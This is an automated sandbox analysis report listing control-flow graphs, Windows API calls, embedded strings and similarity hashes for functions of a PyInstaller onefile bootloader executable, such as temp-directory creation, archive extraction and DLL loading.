• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction ID: 1fc06cf030bcc3955ffb3441f5565ea066e3bc27c2c8ad2734c333fd71ae113e
• Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction Fuzzy Hash: 07D17D33A08A8686FB10AF74EC552A9B764FF84B58FC04275DA5D52BA8DF3CE544C710

Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 62 7ff70aef1000-7ff70aef3806 call 7ff70aeffe88 call 7ff70aeffe90 call 7ff70aefc8c0 call 7ff70af05460 call 7ff70af054f4 call 7ff70aef36b0 76 7ff70aef3814-7ff70aef3836 call 7ff70aef1950 62->76 77 7ff70aef3808-7ff70aef380f 62->77 83 7ff70aef391b-7ff70aef3931 call 7ff70aef45b0 76->83 84 7ff70aef383c-7ff70aef3856 call 7ff70aef1c80 76->84 78 7ff70aef3c97-7ff70aef3cb2 call 7ff70aefc5c0 77->78 89 7ff70aef3933-7ff70aef3960 call 7ff70aef7f80 83->89 90 7ff70aef396a-7ff70aef397f call 7ff70aef2710 83->90 88 7ff70aef385b-7ff70aef389b call 7ff70aef8a20 84->88 97 7ff70aef38c1-7ff70aef38cc call 7ff70af04fa0 88->97 98 7ff70aef389d-7ff70aef38a3 88->98 100 7ff70aef3984-7ff70aef39a6 call 7ff70aef1c80 89->100 101 7ff70aef3962-7ff70aef3965 call 7ff70af000bc 89->101 102 7ff70aef3c8f 90->102 110 7ff70aef38d2-7ff70aef38e1 call 7ff70aef8a20 97->110 111 7ff70aef39fc-7ff70aef3a2a call 7ff70aef8b30 call 7ff70aef8b90 * 3 97->111 103 7ff70aef38a5-7ff70aef38ad 98->103 104 7ff70aef38af-7ff70aef38bd call 7ff70aef8b90 98->104 115 7ff70aef39b0-7ff70aef39b9 100->115 101->90 102->78 103->104 104->97 119 7ff70aef39f4-7ff70aef39f7 call 7ff70af04fa0 110->119 120 7ff70aef38e7-7ff70aef38ed 110->120 138 7ff70aef3a2f-7ff70aef3a3e call 7ff70aef8a20 111->138 115->115 118 7ff70aef39bb-7ff70aef39d8 call 7ff70aef1950 115->118 118->88 127 7ff70aef39de-7ff70aef39ef call 7ff70aef2710 118->127 119->111 124 7ff70aef38f0-7ff70aef38fc 120->124 128 7ff70aef3905-7ff70aef3908 124->128 129 7ff70aef38fe-7ff70aef3903 124->129 127->102 128->119 132 7ff70aef390e-7ff70aef3916 call 7ff70af04fa0 128->132 129->124 129->128 132->138 141 7ff70aef3b45-7ff70aef3b53 138->141 142 7ff70aef3a44-7ff70aef3a47 138->142 144 7ff70aef3b59-7ff70aef3b5d 141->144 145 7ff70aef3a67 141->145 142->141 143 
7ff70aef3a4d-7ff70aef3a50 142->143 146 7ff70aef3a56-7ff70aef3a5a 143->146 147 7ff70aef3b14-7ff70aef3b17 143->147 148 7ff70aef3a6b-7ff70aef3a90 call 7ff70af04fa0 144->148 145->148 146->147 149 7ff70aef3a60 146->149 150 7ff70aef3b2f-7ff70aef3b40 call 7ff70aef2710 147->150 151 7ff70aef3b19-7ff70aef3b1d 147->151 157 7ff70aef3a92-7ff70aef3aa6 call 7ff70aef8b30 148->157 158 7ff70aef3aab-7ff70aef3ac0 148->158 149->145 159 7ff70aef3c7f-7ff70aef3c87 150->159 151->150 153 7ff70aef3b1f-7ff70aef3b2a 151->153 153->148 157->158 161 7ff70aef3ac6-7ff70aef3aca 158->161 162 7ff70aef3be8-7ff70aef3bfa call 7ff70aef8a20 158->162 159->102 164 7ff70aef3ad0-7ff70aef3ae8 call 7ff70af052c0 161->164 165 7ff70aef3bcd-7ff70aef3be2 call 7ff70aef1940 161->165 170 7ff70aef3c2e 162->170 171 7ff70aef3bfc-7ff70aef3c02 162->171 176 7ff70aef3b62-7ff70aef3b7a call 7ff70af052c0 164->176 177 7ff70aef3aea-7ff70aef3b02 call 7ff70af052c0 164->177 165->161 165->162 173 7ff70aef3c31-7ff70aef3c40 call 7ff70af04fa0 170->173 174 7ff70aef3c04-7ff70aef3c1c 171->174 175 7ff70aef3c1e-7ff70aef3c2c 171->175 185 7ff70aef3c46-7ff70aef3c4a 173->185 186 7ff70aef3d41-7ff70aef3d63 call 7ff70aef44d0 173->186 174->173 175->173 187 7ff70aef3b7c-7ff70aef3b80 176->187 188 7ff70aef3b87-7ff70aef3b9f call 7ff70af052c0 176->188 177->165 184 7ff70aef3b08-7ff70aef3b0f 177->184 184->165 190 7ff70aef3cd4-7ff70aef3ce6 call 7ff70aef8a20 185->190 191 7ff70aef3c50-7ff70aef3c5f call 7ff70aef90e0 185->191 201 7ff70aef3d65-7ff70aef3d6f call 7ff70aef4620 186->201 202 7ff70aef3d71-7ff70aef3d82 call 7ff70aef1c80 186->202 187->188 197 7ff70aef3ba1-7ff70aef3ba5 188->197 198 7ff70aef3bac-7ff70aef3bc4 call 7ff70af052c0 188->198 206 7ff70aef3d35-7ff70aef3d3c 190->206 207 7ff70aef3ce8-7ff70aef3ceb 190->207 204 7ff70aef3cb3-7ff70aef3cb6 call 7ff70aef8850 191->204 205 7ff70aef3c61 191->205 197->198 198->165 217 7ff70aef3bc6 198->217 215 7ff70aef3d87-7ff70aef3d96 201->215 202->215 216 7ff70aef3cbb-7ff70aef3cbd 204->216 212 7ff70aef3c68 call 7ff70aef2710 
205->212 206->212 207->206 213 7ff70aef3ced-7ff70aef3d10 call 7ff70aef1c80 207->213 226 7ff70aef3c6d-7ff70aef3c77 212->226 230 7ff70aef3d12-7ff70aef3d26 call 7ff70aef2710 call 7ff70af04fa0 213->230 231 7ff70aef3d2b-7ff70aef3d33 call 7ff70af04fa0 213->231 220 7ff70aef3dc4-7ff70aef3dda call 7ff70aef9400 215->220 221 7ff70aef3d98-7ff70aef3d9f 215->221 224 7ff70aef3cbf-7ff70aef3cc6 216->224 225 7ff70aef3cc8-7ff70aef3ccf 216->225 217->165 233 7ff70aef3ddc 220->233 234 7ff70aef3de8-7ff70aef3e04 SetDllDirectoryW 220->234 221->220 222 7ff70aef3da1-7ff70aef3da5 221->222 222->220 228 7ff70aef3da7-7ff70aef3dbe SetDllDirectoryW LoadLibraryExW 222->228 224->212 225->215 226->159 228->220 230->226 231->215 233->234 237 7ff70aef3f01-7ff70aef3f08 234->237 238 7ff70aef3e0a-7ff70aef3e19 call 7ff70aef8a20 234->238 241 7ff70aef3f0e-7ff70aef3f15 237->241 242 7ff70aef3ffc-7ff70aef4004 237->242 251 7ff70aef3e32-7ff70aef3e3c call 7ff70af04fa0 238->251 252 7ff70aef3e1b-7ff70aef3e21 238->252 241->242 245 7ff70aef3f1b-7ff70aef3f25 call 7ff70aef33c0 241->245 246 7ff70aef4006-7ff70aef4023 PostMessageW GetMessageW 242->246 247 7ff70aef4029-7ff70aef405b call 7ff70aef36a0 call 7ff70aef3360 call 7ff70aef3670 call 7ff70aef6fb0 call 7ff70aef6d60 242->247 245->226 259 7ff70aef3f2b-7ff70aef3f3f call 7ff70aef90c0 245->259 246->247 261 7ff70aef3ef2-7ff70aef3efc call 7ff70aef8b30 251->261 262 7ff70aef3e42-7ff70aef3e48 251->262 255 7ff70aef3e23-7ff70aef3e2b 252->255 256 7ff70aef3e2d-7ff70aef3e2f 252->256 255->256 256->251 271 7ff70aef3f64-7ff70aef3fa0 call 7ff70aef8b30 call 7ff70aef8bd0 call 7ff70aef6fb0 call 7ff70aef6d60 call 7ff70aef8ad0 259->271 272 7ff70aef3f41-7ff70aef3f5e PostMessageW GetMessageW 259->272 261->237 262->261 266 7ff70aef3e4e-7ff70aef3e54 262->266 269 7ff70aef3e56-7ff70aef3e58 266->269 270 7ff70aef3e5f-7ff70aef3e61 266->270 274 7ff70aef3e5a 269->274 275 7ff70aef3e67-7ff70aef3e83 call 7ff70aef6db0 call 7ff70aef7330 269->275 270->237 270->275 307 7ff70aef3fa5-7ff70aef3fa7 271->307 
272->271 274->237 290 7ff70aef3e85-7ff70aef3e8c 275->290 291 7ff70aef3e8e-7ff70aef3e95 275->291 293 7ff70aef3edb-7ff70aef3ef0 call 7ff70aef2a50 call 7ff70aef6fb0 call 7ff70aef6d60 290->293 294 7ff70aef3eaf-7ff70aef3eb9 call 7ff70aef71a0 291->294 295 7ff70aef3e97-7ff70aef3ea4 call 7ff70aef6df0 291->295 293->237 305 7ff70aef3ec4-7ff70aef3ed2 call 7ff70aef74e0 294->305 306 7ff70aef3ebb-7ff70aef3ec2 294->306 295->294 304 7ff70aef3ea6-7ff70aef3ead 295->304 304->293 305->237 318 7ff70aef3ed4 305->318 306->293 310 7ff70aef3fe9-7ff70aef3ff7 call 7ff70aef1900 307->310 311 7ff70aef3fa9-7ff70aef3fb3 call 7ff70aef9200 307->311 310->226 311->310 321 7ff70aef3fb5-7ff70aef3fca 311->321 318->293 322 7ff70aef3fe4 call 7ff70aef2a50 321->322 323 7ff70aef3fcc-7ff70aef3fdf call 7ff70aef2710 call 7ff70aef1900 321->323 322->310 323->226
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                                      • Instruction ID: 512d295fc8a0aedf45d839b72d19af62bea828e99f73b50e2f05f35f50c8a1ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C324B23A0868391FA25FB25DC562B9E691EF44780FC440B2DA6D472D6EF2CF555D320

Control-flow Graph

APIs
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: fee2240f18cc0681cbe84178b752af54e8ac407ae10f2cc67f00e149f3bc37ce
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: B5C1BD37B28A4186FB50EFA5C8906AC7761EB49BA8F814275DF2E97794CF38E011C310

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF841B
• RemoveDirectoryW.KERNEL32(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF849E
• DeleteFileW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84BD
• FindNextFileW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84CB
• FindClose.KERNEL32(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84DC
• RemoveDirectoryW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84E5
Strings
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction ID: 4ee7bc68b35650c2bb8fea699c5c663a21a8bfaf89951a574c550c53d7c74005
• Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction Fuzzy Hash: 75414D23A0C98385FA20BB24EC455B9A360FF95754FD00676D99D47694EF3CE54A8720
APIs
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: d0f5d35faed1815700424b9a574bae96a05fb0783f9ac5742d461abb14766490
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 84F04423A1964386F760AB60F849766A350EF84764F940275DDAD027D4DF3CE0498A10

Control-flow Graph

APIs
  • Part of subcall function 00007FF70AEF7F80: _fread_nolock.LIBCMT ref: 00007FF70AEF802A
• _fread_nolock.LIBCMT ref: 00007FF70AEF1A1B
  • Part of subcall function 00007FF70AEF2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF70AEF1B6A), ref: 00007FF70AEF295E
Strings
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
• Instruction ID: 669f04b8111f3b23354048927e35cb9dc10bb94b5a961e5806075cecc692210b
• Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
• Instruction Fuzzy Hash: 2F817D73A08687C5FB24FB24D8426B9A3A0EF48784FC445B5EA8D87785DF3CE5858760

Control-flow Graph

control_flow_graph 407 7ff70aef1600-7ff70aef1611 408 7ff70aef1613-7ff70aef161c call 7ff70aef1050 407->408 409 7ff70aef1637-7ff70aef1651 call 7ff70aef45b0 407->409 414 7ff70aef162e-7ff70aef1636 408->414 415 7ff70aef161e-7ff70aef1629 call 7ff70aef2710 408->415 416 7ff70aef1653-7ff70aef1681 call 7ff70af04f78 call 7ff70aef2910 409->416 417 7ff70aef1682-7ff70aef169c call 7ff70aef45b0 409->417 415->414 423 7ff70aef169e-7ff70aef16b3 call 7ff70aef2710 417->423 424 7ff70aef16b8-7ff70aef16cf call 7ff70af00744 417->424 431 7ff70aef1821-7ff70aef1824 call 7ff70af000bc 423->431 432 7ff70aef16d1-7ff70aef16f4 call 7ff70af04f78 call 7ff70aef2910 424->432 433 7ff70aef16f9-7ff70aef16fd 424->433 439 7ff70aef1829-7ff70aef183b 431->439 445 7ff70aef1819-7ff70aef181c call 7ff70af000bc 432->445 436 7ff70aef16ff-7ff70aef170b call 7ff70aef1210 433->436 437 7ff70aef1717-7ff70aef1737 call 7ff70af04fb4 433->437 442 7ff70aef1710-7ff70aef1712 436->442 446 7ff70aef1761-7ff70aef176c 437->446 447 7ff70aef1739-7ff70aef175c call 7ff70af04f78 call 7ff70aef2910 437->447 442->445 445->431 451 7ff70aef1802-7ff70aef180a call 7ff70af04fa0 446->451 452 7ff70aef1772-7ff70aef1777 446->452 459 7ff70aef180f-7ff70aef1814 447->459 451->459 454 7ff70aef1780-7ff70aef17a2 call 7ff70af0040c 452->454 462 7ff70aef17a4-7ff70aef17bc call 7ff70af00b4c 454->462 463 7ff70aef17da-7ff70aef17e6 call 7ff70af04f78 454->463 459->445 468 7ff70aef17c5-7ff70aef17d8 call 7ff70af04f78 462->468 469 7ff70aef17be-7ff70aef17c1 462->469 470 7ff70aef17ed-7ff70aef17f8 call 7ff70aef2910 463->470 468->470 469->454 471 7ff70aef17c3 469->471 474 7ff70aef17fd 470->474 471->474 474->451
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction ID: 109978e0a95fcee77d60de156a030688d1b56c1033f11b4ac0d21c72eb3f1953
• Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction Fuzzy Hash: BE516763A08687C2FA10BB21EC025A9A3A0EF44B94FC446B5EE0C477D6EF3CF5458760

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF88F4
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF88FA
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF893C
  • Part of subcall function 00007FF70AEF8A20: GetEnvironmentVariableW.KERNEL32(00007FF70AEF388E), ref: 00007FF70AEF8A57
  • Part of subcall function 00007FF70AEF8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF70AEF8A79
  • Part of subcall function 00007FF70AF082A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF082C1
  • Part of subcall function 00007FF70AEF2810: MessageBoxW.USER32 ref: 00007FF70AEF28EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction ID: 5ca41a01172a02c53cce1f36a6b2d5dc8b0615e11e3f26f5ca531eb66ac0efeb
• Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction Fuzzy Hash: 9A417B23A1968345FA24BB65EC562BAD390EF897D0FC041B1EE0D8779ADF3CE5058760

Control-flow Graph

control_flow_graph 599 7ff70aef1210-7ff70aef126d call 7ff70aefbdf0 602 7ff70aef126f-7ff70aef1296 call 7ff70aef2710 599->602 603 7ff70aef1297-7ff70aef12af call 7ff70af04fb4 599->603 608 7ff70aef12d4-7ff70aef12e4 call 7ff70af04fb4 603->608 609 7ff70aef12b1-7ff70aef12cf call 7ff70af04f78 call 7ff70aef2910 603->609 614 7ff70aef12e6-7ff70aef1304 call 7ff70af04f78 call 7ff70aef2910 608->614 615 7ff70aef1309-7ff70aef131b 608->615 620 7ff70aef1439-7ff70aef144e call 7ff70aefbad0 call 7ff70af04fa0 * 2 609->620 614->620 618 7ff70aef1320-7ff70aef1345 call 7ff70af0040c 615->618 628 7ff70aef1431 618->628 629 7ff70aef134b-7ff70aef1355 call 7ff70af00180 618->629 637 7ff70aef1453-7ff70aef146d 620->637 628->620 629->628 635 7ff70aef135b-7ff70aef1367 629->635 636 7ff70aef1370-7ff70aef1398 call 7ff70aefa230 635->636 640 7ff70aef1416-7ff70aef142c call 7ff70aef2710 636->640 641 7ff70aef139a-7ff70aef139d 636->641 640->628 642 7ff70aef1411 641->642 643 7ff70aef139f-7ff70aef13a9 641->643 642->640 645 7ff70aef13d4-7ff70aef13d7 643->645 646 7ff70aef13ab-7ff70aef13b9 call 7ff70af00b4c 643->646 648 7ff70aef13d9-7ff70aef13e7 call 7ff70af19ea0 645->648 649 7ff70aef13ea-7ff70aef13ef 645->649 651 7ff70aef13be-7ff70aef13c1 646->651 648->649 649->636 650 7ff70aef13f5-7ff70aef13f8 649->650 653 7ff70aef140c-7ff70aef140f 650->653 654 7ff70aef13fa-7ff70aef13fd 650->654 655 7ff70aef13c3-7ff70aef13cd call 7ff70af00180 651->655 656 7ff70aef13cf-7ff70aef13d2 651->656 653->628 654->640 658 7ff70aef13ff-7ff70aef1407 654->658 655->649 655->656 656->640 658->618
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
• Instruction ID: 05e2bb197f5b083b8943c092de5c543f11f358d40ed9de2f895ee63ca7bb7cdf
• Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
• Instruction Fuzzy Hash: 6D51BD23A0868785FA60BB11EC513BAE291EF85794FC442B5EE4D87BC5EF3CE5058720

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF70AF0F11A,?,?,-00000018,00007FF70AF0ADC3,?,?,?,00007FF70AF0ACBA,?,?,?,00007FF70AF05FAE), ref: 00007FF70AF0EEFC
• GetProcAddress.KERNEL32(?,?,?,00007FF70AF0F11A,?,?,-00000018,00007FF70AF0ADC3,?,?,?,00007FF70AF0ACBA,?,?,?,00007FF70AF05FAE), ref: 00007FF70AF0EF08
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction ID: 43b9e43554950be46b47241bf82b59626c58c008164e4257c3323821dba8799c
• Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction Fuzzy Hash: 2D41F123B19A1681FA15EB16DC04AB5E392BF48B90FC98979ED1D87394EF3CF4058320

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF70AEF3804), ref: 00007FF70AEF36E1
• GetLastError.KERNEL32(?,00007FF70AEF3804), ref: 00007FF70AEF36EB
  • Part of subcall function 00007FF70AEF2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2C9E
  • Part of subcall function 00007FF70AEF2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2D63
  • Part of subcall function 00007FF70AEF2C50: MessageBoxW.USER32 ref: 00007FF70AEF2D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: 7231f908d9f7499947c38fe57585a1e949a90e0bc55474b3429169d04aadf15a
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 44215163B1C64381FA20BB24EC563B6A250FF88394FC04172E66D866E6EF2CF505C720

Control-flow Graph

[Control-flow graph for the function at 7ff70af0bacc; the rendered block/edge list is omitted. The graph references the APIs GetConsoleMode, ReadFile, ReadConsoleW and GetLastError and the subcalls 7ff70af04f58, 7ff70af04f78, 7ff70af0a950, 7ff70af0a9b8, 7ff70af0d66c, 7ff70af0c2f4, 7ff70af1398c, 7ff70af04eec, 7ff70af0b6e4 and 7ff70af0b524.]
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
